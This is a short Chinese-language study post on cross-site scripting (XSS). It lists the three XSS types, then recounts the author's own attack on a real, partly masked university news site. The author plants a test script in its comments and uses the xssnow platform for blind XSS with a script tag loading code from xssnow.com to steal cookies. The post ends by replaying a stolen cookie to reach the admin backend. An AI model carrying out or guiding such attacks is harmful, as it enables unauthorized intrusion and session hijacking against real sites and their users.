看到xss章节,很多还是不太懂的,还需要再继续学习javascript等相关的知识,推荐学习网站http://www.w3cschool.cn/,下面的知识点是主要是之前看到过的内容,并附上自己的小实战
xss类型
1. 反射型
2. 存储型
3. DOM Based型
原理:
注:上图来自http://yttitan.blog.51cto.com/70821/1571910
实战例子:
- 存储式跨站脚本漏洞检测
在留言内容中填写包含有跨站测试的脚本,提交后观察返回效果。
<script>alert("XSS TEST")</script>
新闻网能评论的地方都有相应的xss漏洞,下面举例
Url:http://news.*.edu.cn//html/zonghexw/show_8890.html
验证:利用xssnow平台
将如图中的代码写入评论区,即xss盲打
提交评论后弹窗,提交成功,由于需要管理审核要等待,我们可以进行本地触发。
2. 利用存储式跨站漏洞窃取用户cookie
首先将<script src=http://xssnow.com/JoEL></script>
将其保存为xsstest.html文件,如下图
然后打开xsstest.html,再到xssnow平台查看项目内容如下图可以得到cookie
3. 利用xss平台 如xssnow、webxss 等获取cookie 然后用阿D浏览网页,修改cookie,然后再刷新网页就是后台管理页面了